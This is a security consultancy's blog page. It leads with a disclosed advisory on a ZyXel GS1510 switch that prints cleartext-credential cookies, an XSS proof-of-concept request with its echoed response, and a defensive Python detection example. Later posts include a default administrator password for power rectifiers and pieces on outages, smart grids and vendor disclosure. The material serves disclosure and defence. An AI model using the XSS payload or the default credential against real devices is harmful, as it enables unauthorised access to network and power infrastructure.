Blog « IT Security Geeks

Multiple vulnerabilities in ZyXel GS1510

A few weeks ago, a set of vulnerabilities that we identified was publicly released on Upsploit.com. These vulnerabilities were discovered in our testing environment while playing around with a ZyXel GS1510 Ethernet switch.

This advisory was publicly released on 2012-03-14 at 12:57:15 with the Upsploit reference UPS-2011-0042.

The vulnerabilities that were discovered were the following:

1. The cookie for the admin user of the switch stored both the admin username and password in clear text.

2. The passwords of any users logging into the switch were being submitted in clear text over HTTP via the following form:

http://192.168.1.5/webctrl.cgi

HTTP Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b</title><script>alert(xss)</script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response, as can be seen below.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.

Request

GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1
Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT
Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT
Accept-Ranges: bytes
Connection: close

<HTML>
<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
…[SNIP]…
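The checks behind findings 1 and 3, as an added example that is not part of the advisory or of ZyXel's code: a constructed model of the directory index that echoes the request target into <TITLE> (as in the response above) beside an escaped version, the marker-wrapped probe technique the advisory used to spot the unmodified reflection, and a shape heuristic that flags cookies such as admin=password123 that carry credentials rather than an opaque token. The renderers and sample values are constructed; no traffic is sent.

```python
import html
import re
import secrets

PAYLOAD = "</title><script>alert(1)</script>"      # payload used in the advisory
TOKEN_RE = re.compile(r"^[A-Za-z0-9+/=_\-]{16,}$")  # shape of an opaque session token

def render_index_vulnerable(request_target: str) -> str:
    """Constructed model of the behaviour in the response above: the request
    target is copied into <TITLE> and <H2> verbatim. Not thttpd's own code."""
    return (f"<HTML><HEAD><TITLE>Index of {request_target}</TITLE></HEAD>"
            f"<BODY><H2>Index of {request_target}</H2></BODY></HTML>")

def render_index_hardened(request_target: str) -> str:
    """Same page with the untrusted value entity-encoded before insertion."""
    safe = html.escape(request_target, quote=True)
    return (f"<HTML><HEAD><TITLE>Index of {safe}</TITLE></HEAD>"
            f"<BODY><H2>Index of {safe}</H2></BODY></HTML>")

def make_probe(payload: str = PAYLOAD) -> tuple[str, str, str]:
    """Wrap the payload in two random markers (like fe07b...b7e71e54af6 above)
    so the check can locate exactly where the input landed."""
    prefix, suffix = secrets.token_hex(3), secrets.token_hex(6)
    return prefix, prefix + payload + suffix, suffix

def reflection_state(body: str, prefix: str, suffix: str,
                     payload: str = PAYLOAD) -> str:
    """Classify the text between the markers: 'unmodified' = echoed as-is
    (reflected XSS), 'escaped' = entity-encoded, 'altered' = changed some
    other way, 'not_reflected' = markers absent from the response."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "not_reflected"
    between = m.group(1)
    if between == payload:
        return "unmodified"
    if between == html.escape(payload, quote=True):
        return "escaped"
    return "altered"

def check_renderer(path: str, render) -> str:
    """Send one probe through a renderer as a parameter name and classify it."""
    prefix, probe, suffix = make_probe()
    return reflection_state(render(f"{path}?{probe}=1"), prefix, suffix)

def weak_cookie_pairs(cookie_header: str) -> list[str]:
    """Heuristic for finding 1: return name=value pairs whose value is not
    token-shaped, e.g. 'admin=password123', which is the credential itself."""
    pairs = [p.strip() for p in cookie_header.split(";") if "=" in p]
    return [p for p in pairs if not TOKEN_RE.match(p.split("=", 1)[1])]

if __name__ == "__main__":
    print(check_renderer("/images/", render_index_vulnerable))  # unmodified
    print(check_renderer("/images/", render_index_hardened))    # escaped
    print(weak_cookie_pairs("admin=password123"))               # ['admin=password123']
```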

Congratulations go out to Neil Fryer for identifying and reporting this issue.

We would also like to extend our gratitude to the staff at ZyXel and the guys at Upsploit.com for working with us to get these vulnerabilities patched in a timely manner.

This is just another reason why it’s always a good idea to have a penetration test, or at the very least a vulnerability assessment, conducted on all new devices that will be deployed within your organisation’s network.

If you would like any details on our device security testing or penetration testing services please feel free to contact us.

Filed under: Vulnerabilities

When you’re your own worst enemy.

Loss of data and system downtime are a problem. For most people reading this, that is a self-evident truth. What I find “on the ground”, though, is a wholly different and unsavoury matter altogether.

I was recently socialising off the clock with a few folks in the telecommunications industry, and a story was relayed to me: a story that prompted me to clock in as a security professional and offer advice and guidance, as I could not in good conscience let it pass without at least pointing a few things out.

During the course of the week starting 19/03/12, an operating company of a very large mobile operator experienced a system outage.

The outage impacted the operator’s soft revenue generation mechanism (call completion to the terminating subscriber when that subscriber is IMSI detached) for a significant portion of that region’s subscriber base. It happens. Hardware does not last forever; in particular, hard drives have a limited lifespan. How you prevent the widespread impact of drive losses is well known: effective storage system design, a hardline approach to backups, competent intervention teams (vendor and operator), and system re-engineering as a result of effective problem management.

By the time I heard about the problem it was still ongoing, had been for days, and had been attributed to a “Known Error” which had occurred many times in the past on this vendor’s product line.

The vendor field intervention team reacted to the client report and reverted to their global support centre. A JBOD had failed.

The recommended intervention, which would not have resolved the outage anyway, cemented the problem by corrupting the root filesystem. This further aggravated the outage by introducing additional system failures. This “Known Error” had clearly not been effectively documented in the vendor’s knowledge base, nor had it been addressed with effective problem management despite its prior occurrences globally. Nor was the senior support person assisting the incident response team sufficiently qualified to deliver support.

The last backup had been performed two years prior, and when it was restored it did not work – I won’t go into why, but I will say that the 2010 backup was not sane and therefore useless, and essentially not a backup at all.

Not only was there no backup policy in place for a production system, which in itself is a violation of the operator’s mandate for systems under the control of Vendor Managed Services, but for years the field teams did not follow the internal Field Change procedures laid out, i.e. backups before and after implementation of Field Change Orders; several Change Orders had been implemented in the past two years.

A sad state of affairs. Fortunately, this problem could have been resolved with a few more hours of work and a sound understanding of Unix. On a system built around 4 Unix boxes, a number of Linux machines and a few instances of a real-time OS, one would expect incident response teams to be knowledgeable, or to have the means to solve these problems within the team. They could not, and subsequently a senior vendor resource had to be flown into the region unnecessarily, at great expense (long-haul flight, hotel, per diem), to perform the rebuild: a rebuild that could have been procured on a day rate from skilled resources in the region at a fraction of the overall cost and with a quicker turnaround time.

So, we have a loss of operator revenue, data, reputation and a severe impact on vendor operational expenditure and reputation.

All of this is simply a compounded effect of:

  • Poor procedure
  • Lack of stakeholder oversight
  • Poor Service Level Agreement management
  • Poor risk analysis and impact assessments associated with Managed Service contracts
  • Low cost and arguably inadequate resources tied to Managed Services
  • Absence of training and development of aforementioned resources
  • Lack of regular, independent assessment and testing of Managed Services capabilities
  • Lack of regular, independent assessment and testing of Vendor Support mechanisms

The requirement for a well-defined penetration testing program is about more than just testing your estate against cyber attack. It’s about identifying all vulnerabilities in your operation, be they physical, technical or human in nature. Penetration testing needs to be a full-time consultancy covering all aspects of your business, no matter what.

Ever changing faces of vulnerabilities.

McAfee’s latest proof-of-concept showed the ability to seriously injure someone with a direct cyber attack. This involved an attack on an implanted insulin pump. The pump could be induced to fully discharge its contents. In a diabetic, this will cause hypoglycæmia, which may result in death or brain damage if prolonged.

We’d like to congratulate Barnaby Jack for bringing attention to this.

We at I.T. Security Geeks have long held the belief that this sort of thing is possible. While our focus has largely been directed at conventional, commonplace vulnerabilities, we spend a fair amount of time working with obscure appliances and identifying issues with those products.

In my own area of influence, I’ve exploited rectifiers in controlled circumstances to effect power failures and fires (easier than Jack’s Medtronic exploit, as you really don’t need to have much knowledge, and most rectifiers are deployed with factory default PIN codes for administrator access). Don’t believe me? One of the world’s foremost suppliers of DC power systems has a default password for the user “Admin” that is: “1”

Yes, the number 1.

I have personally accessed production power systems in operators where this default was discovered, and upon making my recommendations for immediate action was told, “No. We keep it like that to make it easier for our technicians.” or “We don’t perceive a problem with that.”

No perceived problem? How so? The manual for this particular device tells me:

The User has full access to all menus; including update the OS application and modifying, adding, and deleting Users.

Via the WEB Interface, a User (with proper access level) can:

  • View real-time operating information (rectifiers, converters, AC, DC, Batteries, etc.).
  • View and download information recorded in logs.
  • Send control commands.
  • Set programmable parameters.
  • Download and upload configuration files.
  • Download firmware to the Controller.


Curious, is it not?


I truly guarantee that if you are a telecommunications operator or co-location provider, you have this vendor’s product somewhere in your network. Call us to chat.


Moving Towards A Darker Future…

Smart grids are being hailed as a potential solution to the impending energy supply problems the world will face over the coming years.

The intent is to intelligently manage use in accordance with supply and to alter tariffs to drive healthy usage patterns. Fair enough. It’s clever business, welcomed by all, that is if we ignore the obvious high cost of delivery.

Accounting and sentiment aside, the real issue we see is the inherent risk in creating a management network such as a smart grid.

Many current investigations into the technology, as well as planned deployments, tout trendy capabilities.

Mobile device compatibility, i.e. the ability to control your home’s appliances remotely to take advantage of low-tariff times. Despite the obvious limitations in the theory, I am somewhat surprised that this is even being thought of anywhere, that is anywhere with an eye on Health and Safety.

Random and malicious attacks on grid residents could compromise authentication details in a number of ways, and while mischief and damage could result, the same problem exists elsewhere, where the damage would be so much more significant.

Mobile Network Infrastructure 

In the ever demanding economic climate, many telecommunications operators across the globe have invested significantly in expenditure reduction programs.

In one way or another, smart meters are finding themselves part and parcel of mobile networks for this reason. Smart meter solutions are installed with relays for cutting energy supplies, switching energy sources, or disconnecting subtended devices such as network equipment.

In almost all cases, solutions are scoped in a manner that gives very little consideration to direct attack scenarios. It is a fact that most solutions are sold on the basis of cost savings and unified control and management capabilities, not security. If we are learning one thing of late, it is that co-ordinated infrastructure attacks are possible and are happening as we speak. We are also certain that Iranian nuclear enrichment facilities are a lot harder to penetrate than your average mobile operator, and it was done with impunity and anonymity.

It’s not all doom and gloom though: our high-value penetration testing team at I.T. Security Geeks can help. Contact us for more information.


Brad Smith (aka theNurse) Donation Button

We have recently added a button to the side of our web site for people to click and donate directly via PayPal to the Brad Smith fund, as we can’t imagine what his family must be going through right now.

For those readers who don’t know who Brad Smith is, he’s a talented and humorous security professional who also goes by the online name “theNurse”.

During Brad’s presentation at the Hacker Halted conference in Florida, he suffered a massive stroke and has been in a coma in hospital since then.

The guys over at Social-Engineer.org along with @humanhacker set up this donation for Brad’s family to assist with any out of pocket expenses that they have.

We couldn’t have worded this better, so to quote the guys over at Social-Engineer.org:

“Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. ”

Social-Engineer.org have an update page up and running with updates from Brad’s wife Nina, which can be found here.


Filed under: News

An Open Letter to Software Vendors

On the 28th September 2011, we notified a vendor about multiple security vulnerabilities in one of their products, and requested contact details of who to send the details on to.

The initial response from the vendor support team took 6 days.

The complete details of the vulnerabilities were disclosed to the vendor on the 5th October. These included screenshots, HTTP requests and responses, and proof-of-concept code for the vulnerabilities. After that, no response was received.

We then sent another e-mail to the vendor on the 11th October, asking for an update on these issues, or if they had even received our original e-mail with the details of the vulnerabilities.

We received no response from the vendor.

On the 8th November, we finally received a response stating “These have been replicated by R&D and they will fix in a later release.” No “Thanks for your help guys”, no dates that these will be patched, no responses to our other queries.

We followed this e-mail up with a response to the vendor, asking to work together on a timed release, and to agree on some reasonable dates. The vendor response was “I have asked for timescales for the fixes and will update you when these are released.”

Now just to be clear, we are not getting paid to disclose these vulnerabilities to any vendors. We are doing this to help make the Internet and networks in general a safer place for all.

We don’t ask for much, just credit for the disclosure of the vulnerability, and a timely patch to mitigate the vulnerabilities. It really doesn’t need to be this difficult to report vulnerabilities, and a little bit of thanks and courtesy never hurt anyone.

To all software and hardware vendors out there: can you please take a few moments to read the Wikipedia article on Responsible Disclosure, which can be found here. Then please try to work with your relevant teams to make it easier to report vulnerabilities in your code and to work with you.

We understand that not all vendors can afford to hire fully fledged security teams, and most security professionals are willing to help you secure your applications and devices just for the credit of finding the vulnerability in your product. That’s got to be the cheapest application security assessment that you’ve ever had!

Little things, like an e-mail address or a form on your website to contact your product security team, or even your developers, would make a world of difference. This would also help to make sure that we, as security researchers, contact the relevant teams within your organisation right off the bat (and don’t get sent around the houses while trying to do you a favour). This way we can always deal with the same person (or team) within your organisation and get any vulnerabilities mitigated in a timely manner.

Please guys and girls, help us to help you. We’re giving you free security advice, educating your developers and strengthening your products, all for a one-liner in your security patch disclosure notification.

Think about it…


Filed under: News,Vulnerabilities

Website 2.0

As you can see we’ve successfully launched the new version of our web site now, and we’d like to say a huge thank you to Tick Tock Computers for all the hard work that they’ve put into this site.

Hopefully this now makes the site more user-friendly and makes finding what you’re looking for a lot easier. Please keep checking back, as we’ll be regularly updating the company blog with news and updates.

If you’ve got any comments on the new web site at all, please drop us a line and let us know; we always value customer feedback.


Filed under: News

SourceFire

We are pleased to announce that we have recently partnered with SourceFire, the leader in intelligent cyber security solutions.

Having worked with SourceFire in the past, along with other IDS vendors, we honestly believe that SourceFire is the current leader in IDS/IPS technologies, and we are honoured to be able to support and sell their offerings going forward.


Filed under: Partners

IT Security Geeks & Rapid7

IT Security Geeks is proud to announce that we have happily partnered with Rapid7. Rapid7 is the leading provider of unified vulnerability management, compliance and penetration testing solutions.

What does this mean to our clients? 

This now means that we are able to sell you the suite of Rapid7 products, such as Metasploit Express, Metasploit Professional, and the range of Nexpose products.

For more info on the Rapid7 range of products or to arrange a demo, please contact us via our contact us page.


Filed under: Partners

IT Security Geeks Partners with IronKey

We are proud to announce that IT Security Geeks has partnered with IronKey, the leader in secure USB drives, so we will be selling these devices and also doing some really exciting things with them.

Website updates will be coming soon, with all the info.


Filed under: Uncategorized